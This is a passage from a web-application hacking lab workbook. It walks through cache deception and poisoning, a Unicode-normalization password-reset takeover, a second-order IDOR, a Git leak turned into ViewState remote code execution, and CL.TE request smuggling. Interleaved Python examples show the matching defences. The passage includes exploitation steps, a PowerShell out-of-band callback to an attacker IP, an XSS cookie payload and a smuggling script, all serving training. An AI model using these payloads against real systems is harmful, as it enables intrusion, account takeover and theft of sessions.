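            return {"status": 302, "headers": {"location": "/login.php"}, "body": ""}
        return {"status": 200,
                "headers": {"content-type": "text/html", "cache-control": "private"},
                "body": "<h1>Welcome user1</h1><a href='/logout.php'>Logout</a>"}
    if path == "/":                               # anonymous home page, cached 20 s
        return {"status": 200,
                "headers": {"content-type": "text/html", "cache-control": "public, max-age=20"},
                "body": "<script src='http://%s/app.js'></script>" % host}
    return {"status": 404, "headers": {"content-type": "text/plain"}, "body": "not found"}

def cacheable_flawed(req, resp):
    # Rule found in many CDN configs: "always cache static file extensions",
    # regardless of what the origin said about the response.
    cc = resp["headers"].get("cache-control", "")
    return resp["status"] == 200 and (req["path"].lower().endswith(STATIC_EXTS) or "public" in cc)

def cacheable_fixed(req, resp):
    # Only the origin's explicit directives decide, and nothing produced for a
    # request that carried a session cookie is ever stored.
    cc = resp["headers"].get("cache-control", "")
    if resp["status"] != 200 or "public" not in cc or "private" in cc or "no-store" in cc:
        return False
    return SESSION_COOKIE not in req["cookies"]

class Edge:
    def __init__(self, policy):
        assert policy in ("flawed", "fixed")
        self.policy, self.cache = policy, {}

    def handle(self, req):
        req = {**req, "headers": dict(req["headers"])}
        if self.policy == "fixed":
            # The edge owns forwarding headers: drop any client-supplied value so
            # an input that is not part of the key cannot shape what gets stored.
            req["headers"].pop("x-forwarded-host", None)
        key = (req["method"], req["headers"]["host"], req["path"])
        if key in self.cache:
            return {**self.cache[key], "cache": "HIT"}
        resp = origin(req)
        ok = cacheable_fixed(req, resp) if self.policy == "fixed" else cacheable_flawed(req, resp)
        if ok:
            self.cache[key] = resp
        return {**resp, "cache": "MISS"}

def deception_outcome(policy):
    """A logged-in victim is lured to /index.php/non-existent.css; an attacker then
    requests the same path without a session. Returns what the attacker sees."""
    edge = Edge(policy)
    edge.handle(make_request("/index.php/non-existent.css", cookies={SESSION_COOKIE: "valid-session"}))
    r = edge.handle(make_request("/index.php/non-existent.css"))
    return {"status": r["status"], "cache": r["cache"], "leaked": "Welcome" in r["body"]}

def poisoning_outcome(policy):
    """An attacker primes the home page with X-Forwarded-Host; a victim then loads it."""
    edge = Edge(policy)
    edge.handle(make_request("/", headers={"X-Forwarded-Host": "attacker.example"}))
    r = edge.handle(make_request("/"))
    return {"cache": r["cache"], "poisoned": "attacker.example" in r["body"]}

if __name__ == "__main__":
    for policy in ("flawed", "fixed"):
        print(policy, "deception:", deception_outcome(policy), "poisoning:", poisoning_outcome(policy))
```

Stripping the header is the simpler fix; the alternative, adding every header the origin reads to the cache key, also works but has to be kept in sync with the application (the same applies to the custom headers behind parts B and C). The deception fix does not depend on the extension list at all, which is the point: the origin's Cache-Control, not the URL, decides whether a response may be shared.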


Module: Miscellaneous Vulnerabilities

Unicode Normalization Attack

Challenge URL: http://reimbursement.webhacklab.com/Account/ResetPassword

• Identify and exploit the forgot password functionality to log in as userX

Solution:
Step 1: Log in to the 'Expense Reimbursement' application using your registered account. Here, we
have used 'john' as the victim user account.

Note: To see the normalized characters rendered in your current version of the Firefox browser, an
additional font package is required, which is already installed in our custom Kali.

Run the following command if you want to test on a different system:

root@kali:~# sudo apt-get install ttf-ancient-fonts


Step 2: Register with the 'Expense Reimbursement' application using Unicode characters as the
username. Here, we have used 'ⒿⓄⒽⓃ' as the user account; for suitable characters you can refer to an
online Unicode tool or Unicode charset tables.


Step 3: Initiate the Forgot Password request and enter the Unicode characters as the username. For
instance, here we have entered 'ⒿⓄⒽⓃ' as the username to reset the password.

Step 4: In another browser (or a private browsing window), open your mailbox to find the received
password reset link, then click the link to reset the password.


Step 5: You will be redirected to the Reset Password page. Enter the new password as desired and
the username must be the same as mentioned above ('ⒿⓄⒽⓃ'). Here, we have set a new
password as 'New@1234'.

Step 6: After submitting the above data, the password has been reset for both the 'john' user and the
'ⒿⓄⒽⓃ' user. This happens because of the way the application normalizes Unicode characters when
handling the username.


Step 7: The password for user 'john' is now set to a new password 'New@1234'.
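How the collision seen in Step 6 arises and how registration and password reset should defend against it, as an added Python example that is not part of the course material: LAB_USERS and the two reset functions are a constructed model of the lab's behaviour, not the application's own code.

```python
import unicodedata


def canonical_username(name: str) -> str:
    """Canonical identity form: NFKC maps compatibility variants such as the
    circled letters used in the lab ('Ⓙ' -> 'J'), then casefold makes the
    comparison case-insensitive ('JOHN' -> 'john')."""
    return unicodedata.normalize("NFKC", name).casefold()


# Constructed user store modelling the lab after Step 2: both 'john' and the
# look-alike 'ⒿⓄⒽⓃ' were allowed to register as separate accounts.
LAB_USERS = {
    1: {"username": "john", "password": "Old@1234"},
    2: {"username": "ⒿⓄⒽⓃ", "password": "Attacker@1"},
}


def register(users: dict, username: str) -> int:
    """Hardened registration: refuse any username whose canonical form collides
    with an existing account, so a look-alike can never shadow 'john'."""
    wanted = canonical_username(username)
    for account in users.values():
        if canonical_username(account["username"]) == wanted:
            raise ValueError("username collides with an existing account")
    new_id = max(users, default=0) + 1
    users[new_id] = {"username": username, "password": None}
    return new_id


def reset_password_vulnerable(users: dict, username: str, new_password: str) -> list:
    """Model of the behaviour seen in Step 6: the reset handler normalizes the
    submitted username and updates every account that matches, so resetting
    'ⒿⓄⒽⓃ' also resets 'john'. Returns the ids that were changed."""
    wanted = canonical_username(username)
    changed = [uid for uid, a in users.items()
               if canonical_username(a["username"]) == wanted]
    for uid in changed:
        users[uid]["password"] = new_password
    return changed


def reset_password_fixed(users: dict, account_id: int, new_password: str) -> list:
    """Hardened reset: the token issued by 'Forgot Password' is bound to exactly
    one account id, and the username typed on the reset form is never used to
    look the account up. Returns the ids that were changed."""
    if account_id not in users:
        return []
    users[account_id]["password"] = new_password
    return [account_id]
```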


Second-order IDOR
Challenge URL: http://reimbursement.webhacklab.com/Expense/LoadExpenseFile?id=

• Exploit Second-order IDOR to view reimbursement details of another user on the application who
owns id = 1, 2, 3

Solution:
Step 1: Login to the Expense Reimbursement application using your registered account and navigate to
the 'Expense' tab. Here, we have used 'john' as an existing user account.

Step 2: Download a sample file (SampleData.xls) from the 'john' user account.


Step 3: Manipulate the 'Amount' column of the Excel data to your desired reimbursement amount.

Step 4: Navigate to the 'Add Expense' feature which allows users to upload a file in XLS format.
Upload the .xls file 'SampleData.xls' (located in kali → '/root/Downloads').


Step 5: The file is uploaded successfully, as shown below.

Step 6: Access the uploaded file listed in 'View All Expenses'; it will show you the expenses
uploaded in the Excel file.

Step 7: Capture the request in Burp when you access the uploaded file:


Step 8: Send the captured request to Repeater; it will be used at a later stage. Now, from the main
Proxy tab, send the request and capture the response. The response is a 302 redirect to
‘/Expense/Success’, which indicates that the id passed in the request belongs to the logged-in user.
Do not forward this response yet:

Step 9: Go to the Repeater tab, change the id value to 3 and send the request; it should look like
below:


Step 10: Go back to the Proxy tab and forward the response. Once the response is forwarded, you
will be able to access and view the reimbursement details of the user who owns reimbursement id 3.


Leverage Git Misconfiguration to ViewState RCE
Challenge URL: http://books.webhacklab.com/.git

• Leverage Git misconfiguration to extract the Machine Key.
• Exploit ViewState to perform Remote Code Execution (RCE).

Solution:
Step 1: Navigate to 'http://books.webhacklab.com/.git/HEAD' and the server will respond with content
as shown in the figure:

Step 2: Run 'git-dumper' tool to extract the source code as shown in the figure:

Command:

root@kali:~/tools/git-dumper-master# ./git-dumper.py
http://books.webhacklab.com/.git <OUTPUT_DIR> -t 30


Step 3: Navigate to the downloaded Git repository and analyze the source code, which contains a
web.config file, as shown in the figure:

Step 4: Extract the Machine Key information from the web.config file, as shown in the figure:


Step 5: Login to the application using your registered account:

Step 6: Capture the request in Burp Suite and observe that the '__VIEWSTATE' parameter is
passed in the request in an encrypted form, as shown in the figure:


Step 7: Start a Python web server on port 8000:

python3 -m http.server

Step 8: Generate the ViewState deserialization payload using 'utility.webhacklab.com', where the
validation key and decryption key are the ones extracted in step 4 and the command is the 'Remote
command' that will be executed, as shown in the figure:

powershell.exe Invoke-WebRequest -Uri http://192.168.4.X:8000/$env:UserName


Step 9: Copy the payload generated in the above step and replace the '__VIEWSTATE' value in the
request captured in step 6 with it, as shown in the figure:

Step 10: URL-encode the key characters of the pasted payload ('URL-encode key characters' in Burp),
as shown in the figure:


Step 11: Forward the request to the server and note that the server responds with '500 Internal
Server Error', as shown in the figure:

Step 12: The payload is successfully executed on the server and the OOB call is received, as shown in
the figure:
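A defensive check that flags the root cause exploited in Steps 3-4, a web.config committed to the repository with literal machineKey values, as an added Python example that is not part of the course or the lab application: both web.config documents are constructed and the key values are placeholders.

```python
import xml.etree.ElementTree as ET

# Constructed web.config resembling what Steps 3-4 recover from the dumped
# repository. The key values are placeholders, not the lab's real keys.
COMMITTED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_0123456789ABCDEF"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_0123456789ABCDEF"
                validation="SHA1" decryption="AES" />
    <pages enableViewStateMac="false" />
  </system.web>
</configuration>
"""

# What the file should look like when keys are not kept in source control:
# AutoGenerate keys live in the machine-level store, not in the file.
HARDENED_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <system.web>
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps" />
    <pages enableViewStateMac="true" />
  </system.web>
</configuration>
"""


def web_config_findings(config_xml: str) -> list:
    """Return (finding, detail) pairs for settings that make ViewState forgeable
    once the file leaks: literal machineKey values (anything not AutoGenerate)
    and ViewState MAC validation switched off. Key material is redacted so the
    report itself does not become a second leak."""
    findings = []
    root = ET.fromstring(config_xml)
    for mk in root.iter("machineKey"):
        for attr in ("validationKey", "decryptionKey"):
            value = mk.get(attr, "")
            if value and not value.startswith("AutoGenerate"):
                findings.append(("literal " + attr, value[:8] + "..."))
    for pages in root.iter("pages"):
        if pages.get("enableViewStateMac", "true").lower() == "false":
            findings.append(("enableViewStateMac", "false"))
    return findings
```

Run it over every web.config in the dumped tree (or as a pre-commit hook) and treat any finding as a rotate-the-keys event, since a key that was ever committed must be assumed known.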


HTTP Desync Attacks

Challenge URL: http://covid19.webhacklab.com:5000

• Discover the Cross-Site Scripting vulnerability.
• Perform an HTTP Desync Attack to get the Cross-Site Script executed when a new user visits.

Solution:
Step 1: Access the application via ‘http://covid19.webhacklab.com:5000’ and try to identify any
Cross-Site Scripting vulnerability:


Step 2: During reconnaissance, a web page vulnerable to reflected Cross-Site Scripting is discovered.
The figure shows that the application executed the injected JavaScript when the URL
http://covid19.webhacklab.com:5000/hello/world%22%3E%3Cimg%20src=a%20onerror=alert(document.location)%3E
was accessed:

Affected Parameter - REST-based 'Name'


Step 3: The figure below shows the HTTP request and response captured for the home page.

Note: You can capture the request of any page from the application:


Step 4: Right click on the Request section in Burp Repeater and click on ‘Change request method’
to change the request from GET to POST:


Step 5: Right click on the Request section in Burp Repeater and click on ‘Convert to chunked’ to
convert the HTTP request to chunked encoding, so that the request header ‘Transfer-Encoding: chunked’
is added:


Step 6: Right click on the Request section in Burp Repeater and click on ‘Smuggle attack (CL.TE)’
to send the request for the Request Smuggling attack (Content-Length / Transfer-Encoding):


Step 7: As soon as you click on ‘Smuggle Attack CL.TE’, the Smuggler extension loads. Copy the
script below and paste it into the Request Smuggler Burp extension, which will perform the CL.TE
Request Smuggling attack. The screenshot is attached below for reference and understanding:

Note: Follow these steps and replace the “Transfer-Encoding: chunked” in the box below:

# Turbo Intruder script; RequestEngine and table are provided by the extension.
def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint='http://covid19.webhacklab.com:5000',
                           concurrentConnections=1,
                           requestsPerConnection=1,
                           pipeline=False,
                           maxRetriesPerRequest=0
                           )

    attack = '''POST / HTTP/1.1
Host: covid19.webhacklab.com:5000
Content-Length: 37
Connection: keep-alive
Transfer-Encoding: chunked

1
A
0

GET /hello/world<img%20src=a%20onerror=alert(document.cookie)> HTTP/1.1
X-Foo: bar'''
    engine.queue(attack)
    engine.start()


def handleResponse(req, interesting):
    table.add(req)
    if req.code == 200:
        # Follow up with plain requests for the home page to observe the result.
        victim = '''GET / HTTP/1.1
Host: covid19.webhacklab.com:5000
Connection: close

'''
        for i in range(10):
            req.engine.queue(victim)


Step 8: Analyze HTTP Request and Response in Turbo Intruder:


Step 9: Once Turbo Intruder is in ‘Attack Mode’, CL.TE requests are sent simultaneously to the
application. When any user visits the application, the payload from Step 7 executes, resulting in
Cross-Site Scripting:


Step 10: This ‘Attack’ will only serve the payload request once:
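How a front end should handle the ambiguous framing that the Step 7 request relies on, as an added Python example that is not part of the course material: CLTE_REQUEST is a constructed byte copy of the Step 7 payload, VICTIM_REQUEST the follow-up from handleResponse, and framing_decision is a hypothetical front-end check, not any product's code.

```python
import re

# Constructed copy of the Step 7 smuggling request (the back end would glue the
# next request on the connection onto 'X-Foo: bar').
CLTE_REQUEST = (
    b"POST / HTTP/1.1\r\n"
    b"Host: covid19.webhacklab.com:5000\r\n"
    b"Content-Length: 37\r\n"
    b"Connection: keep-alive\r\n"
    b"Transfer-Encoding: chunked\r\n"
    b"\r\n"
    b"1\r\nA\r\n0\r\n\r\n"
    b"GET /hello/world<img%20src=a%20onerror=alert(document.cookie)> HTTP/1.1\r\n"
    b"X-Foo: bar"
)
VICTIM_REQUEST = (b"GET / HTTP/1.1\r\nHost: covid19.webhacklab.com:5000\r\n"
                  b"Connection: close\r\n\r\n")


def parse_request_head(raw: bytes) -> tuple:
    """Split a raw HTTP/1.1 request into (request line, [(name, value), ...]);
    header names are lower-cased, values are kept raw for inspection."""
    head = raw.partition(b"\r\n\r\n")[0]
    lines = head.split(b"\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower(), value.strip()))
    return lines[0], headers


def framing_decision(raw: bytes) -> str:
    """How a front end should frame the body. RFC 7230 section 3.3.3: a request
    carrying both Transfer-Encoding and Content-Length is ambiguous and should
    be rejected rather than forwarded, which removes the parser disagreement
    the CL.TE attack needs. Obfuscated or non-chunked codings are rejected too."""
    _, headers = parse_request_head(raw)
    te = [v for n, v in headers if n == b"transfer-encoding"]
    cl = [v for n, v in headers if n == b"content-length"]
    if te and cl:
        return "reject: both Content-Length and Transfer-Encoding present"
    if len(cl) > 1 or any(not re.fullmatch(rb"\d+", v) for v in cl):
        return "reject: malformed Content-Length"
    if te:
        codings = [c.strip().lower() for v in te for c in v.split(b",")]
        if codings[-1] != b"chunked" or any(
                not re.fullmatch(rb"[a-z0-9-]+", c) for c in codings):
            return "reject: unsupported or obfuscated Transfer-Encoding"
        return "chunked"
    return "content-length" if cl else "no-body"
```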

END OF PART - 4
